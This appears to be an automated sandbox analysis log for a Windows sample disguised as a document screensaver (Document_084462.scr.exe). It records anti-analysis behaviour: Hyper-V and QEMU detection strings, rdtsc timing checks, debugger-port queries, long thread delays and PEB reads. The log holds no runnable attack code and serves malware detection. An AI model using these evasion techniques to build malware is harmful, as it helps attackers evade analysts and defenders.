            Source: C:\Users\user\Desktop\Document_084462.scr.exe, API/Special instruction interceptor: Address: 7FFCB7650594
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, API/Special instruction interceptor: Address: 7FFCB764FF74
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, API/Special instruction interceptor: Address: 7FFCB764D6C4
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, API/Special instruction interceptor: Address: 7FFCB764D864
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB764D144
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB7650594
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB764D764
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB764D324
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB764D364
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB764D004
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB764FF74
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB764D6C4
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB764D864
            Source: C:\Windows\SysWOW64\waitfor.exe, API/Special instruction interceptor: Address: 7FFCB764D604
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, File opened: C:\Program Files\qga\qga.exe
            Source: Document_084462.scr.exe, 00000000.00000002.12949271205.0000000000858000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE0Y
            Source: Document_084462.scr.exe, 00000000.00000002.12950443408.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_37AF1763 rdtsc 1_2_37AF1763
            Source: C:\Windows\SysWOW64\waitfor.exe, Window / User API: threadDelayed 9085
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, API coverage: 0.3 %
            Source: C:\Windows\SysWOW64\waitfor.exe, API coverage: 1.2 %
            Source: C:\Windows\SysWOW64\waitfor.exe TID: 2196, Thread sleep count: 121 > 30
            Source: C:\Windows\SysWOW64\waitfor.exe TID: 2196, Thread sleep time: -242000s >= -30000s
            Source: C:\Windows\SysWOW64\waitfor.exe TID: 2196, Thread sleep count: 9085 > 30
            Source: C:\Windows\SysWOW64\waitfor.exe TID: 2196, Thread sleep time: -18170000s >= -30000s
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Last function: Thread delayed
            Source: C:\Windows\SysWOW64\waitfor.exe, Last function: Thread delayed
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_0040674C FindFirstFileW,FindClose, 0_2_0040674C
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405B00
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_00402902 FindFirstFileW, 0_2_00402902
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Guest Shutdown Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmicshutdown
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Document_084462.scr.exe, 00000000.00000002.12949271205.0000000000858000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe0Y
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V PowerShell Direct Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Time Synchronization Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmicvss
            Source: Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191168732.0000000007702000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294914871.0000000007702000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
            Source: Document_084462.scr.exe, 00000000.00000002.12950443408.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Data Exchange Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Heartbeat Service
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Guest Service Interface
            Source: Document_084462.scr.exe, 00000000.00000002.12969572921.000000000A869000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, API call chain: ExitProcess graph end node graph_0-4301
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, API call chain: ExitProcess graph end node graph_0-4455
            Source: C:\Windows\SysWOW64\waitfor.exe, Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\waitfor.exe, Process queried: DebugPort
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_37AF1763 rdtsc 1_2_37AF1763
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_00405456 GetTickCount,lstrlenW,lstrlenW,lstrcatW,SetWindowTextW,SendMessageW,SendMessageW,LdrInitializeThunk,SendMessageW,SendMessageW, 0_2_00405456
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 0_2_700B1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_700B1B5F
            Source: C:\Users\user\Desktop\Document_084462.scr.exe, Code function: 1_2_37B817BC mov eax, dword ptr fs:[00000030h] 1_2_37B817BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD1514 mov eax, dword ptr fs:[00000030h]1_2_37AD1514
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD1514 mov eax, dword ptr fs:[00000030h]1_2_37AD1514
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6550D mov eax, dword ptr fs:[00000030h]1_2_37B6550D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6550D mov eax, dword ptr fs:[00000030h]1_2_37B6550D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6550D mov eax, dword ptr fs:[00000030h]1_2_37B6550D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B39567 mov eax, dword ptr fs:[00000030h]1_2_37B39567
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6B56E mov eax, dword ptr fs:[00000030h]1_2_37B6B56E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6B56E mov ecx, dword ptr fs:[00000030h]1_2_37B6B56E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6B56E mov eax, dword ptr fs:[00000030h]1_2_37B6B56E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B55F mov eax, dword ptr fs:[00000030h]1_2_37B8B55F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B55F mov eax, dword ptr fs:[00000030h]1_2_37B8B55F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B654B0 mov eax, dword ptr fs:[00000030h]1_2_37B654B0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B654B0 mov ecx, dword ptr fs:[00000030h]1_2_37B654B0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3D4A0 mov ecx, dword ptr fs:[00000030h]1_2_37B3D4A0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3D4A0 mov eax, dword ptr fs:[00000030h]1_2_37B3D4A0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3D4A0 mov eax, dword ptr fs:[00000030h]1_2_37B3D4A0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEB490 mov eax, dword ptr fs:[00000030h]1_2_37AEB490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEB490 mov eax, dword ptr fs:[00000030h]1_2_37AEB490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F4FD mov eax, dword ptr fs:[00000030h]1_2_37B6F4FD
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE54E0 mov eax, dword ptr fs:[00000030h]1_2_37AE54E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD94FA mov eax, dword ptr fs:[00000030h]1_2_37AD94FA
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6D430 mov eax, dword ptr fs:[00000030h]1_2_37B6D430
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6D430 mov eax, dword ptr fs:[00000030h]1_2_37B6D430
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB420 mov eax, dword ptr fs:[00000030h]1_2_37AAB420
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE7425 mov eax, dword ptr fs:[00000030h]1_2_37AE7425
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE7425 mov ecx, dword ptr fs:[00000030h]1_2_37AE7425
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4B420 mov eax, dword ptr fs:[00000030h]1_2_37B4B420
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4B420 mov eax, dword ptr fs:[00000030h]1_2_37B4B420
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B39429 mov eax, dword ptr fs:[00000030h]1_2_37B39429
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F409 mov eax, dword ptr fs:[00000030h]1_2_37B6F409
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA7460 mov eax, dword ptr fs:[00000030h]1_2_37AA7460
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA7460 mov eax, dword ptr fs:[00000030h]1_2_37AA7460
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F478 mov eax, dword ptr fs:[00000030h]1_2_37B6F478
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AED450 mov eax, dword ptr fs:[00000030h]1_2_37AED450
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AED450 mov eax, dword ptr fs:[00000030h]1_2_37AED450
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB93A6 mov eax, dword ptr fs:[00000030h]1_2_37AB93A6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB93A6 mov eax, dword ptr fs:[00000030h]1_2_37AB93A6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B51390 mov eax, dword ptr fs:[00000030h]1_2_37B51390
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B51390 mov eax, dword ptr fs:[00000030h]1_2_37B51390
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F38A mov eax, dword ptr fs:[00000030h]1_2_37B6F38A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE33D0 mov eax, dword ptr fs:[00000030h]1_2_37AE33D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD332D mov eax, dword ptr fs:[00000030h]1_2_37AD332D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B83336 mov eax, dword ptr fs:[00000030h]1_2_37B83336
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA9303 mov eax, dword ptr fs:[00000030h]1_2_37AA9303
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA9303 mov eax, dword ptr fs:[00000030h]1_2_37AA9303
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F30A mov eax, dword ptr fs:[00000030h]1_2_37B6F30A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3330C mov eax, dword ptr fs:[00000030h]1_2_37B3330C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3330C mov eax, dword ptr fs:[00000030h]1_2_37B3330C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3330C mov eax, dword ptr fs:[00000030h]1_2_37B3330C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3330C mov eax, dword ptr fs:[00000030h]1_2_37B3330C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B2BC mov eax, dword ptr fs:[00000030h]1_2_37B8B2BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B2BC mov eax, dword ptr fs:[00000030h]1_2_37B8B2BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B2BC mov eax, dword ptr fs:[00000030h]1_2_37B8B2BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B2BC mov eax, dword ptr fs:[00000030h]1_2_37B8B2BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA92AF mov eax, dword ptr fs:[00000030h]1_2_37AA92AF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F2AE mov eax, dword ptr fs:[00000030h]1_2_37B6F2AE
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B792AB mov eax, dword ptr fs:[00000030h]1_2_37B792AB
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB7290 mov eax, dword ptr fs:[00000030h]1_2_37AB7290
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB7290 mov eax, dword ptr fs:[00000030h]1_2_37AB7290
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB7290 mov eax, dword ptr fs:[00000030h]1_2_37AB7290
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAD2EC mov eax, dword ptr fs:[00000030h]1_2_37AAD2EC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAD2EC mov eax, dword ptr fs:[00000030h]1_2_37AAD2EC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA72E0 mov eax, dword ptr fs:[00000030h]1_2_37AA72E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD32C5 mov eax, dword ptr fs:[00000030h]1_2_37AD32C5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE32C0 mov eax, dword ptr fs:[00000030h]1_2_37AE32C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE32C0 mov eax, dword ptr fs:[00000030h]1_2_37AE32C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B832C9 mov eax, dword ptr fs:[00000030h]1_2_37B832C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3B214 mov eax, dword ptr fs:[00000030h]1_2_37B3B214
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3B214 mov eax, dword ptr fs:[00000030h]1_2_37B3B214
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6D270 mov eax, dword ptr fs:[00000030h]1_2_37B6D270
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB273 mov eax, dword ptr fs:[00000030h]1_2_37AAB273
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB273 mov eax, dword ptr fs:[00000030h]1_2_37AAB273
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB273 mov eax, dword ptr fs:[00000030h]1_2_37AAB273
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2D250 mov eax, dword ptr fs:[00000030h]1_2_37B2D250
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2D250 mov ecx, dword ptr fs:[00000030h]1_2_37B2D250
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF24A mov eax, dword ptr fs:[00000030h]1_2_37ADF24A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F247 mov eax, dword ptr fs:[00000030h]1_2_37B6F247
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7124C mov eax, dword ptr fs:[00000030h]1_2_37B7124C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7124C mov eax, dword ptr fs:[00000030h]1_2_37B7124C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7124C mov eax, dword ptr fs:[00000030h]1_2_37B7124C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7124C mov eax, dword ptr fs:[00000030h]1_2_37B7124C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B851B6 mov eax, dword ptr fs:[00000030h]1_2_37B851B6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE31BE mov eax, dword ptr fs:[00000030h]1_2_37AE31BE
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE31BE mov eax, dword ptr fs:[00000030h]1_2_37AE31BE
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD9194 mov eax, dword ptr fs:[00000030h]1_2_37AD9194
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1190 mov eax, dword ptr fs:[00000030h]1_2_37AF1190
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1190 mov eax, dword ptr fs:[00000030h]1_2_37AF1190
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4D1F0 mov eax, dword ptr fs:[00000030h]1_2_37B4D1F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
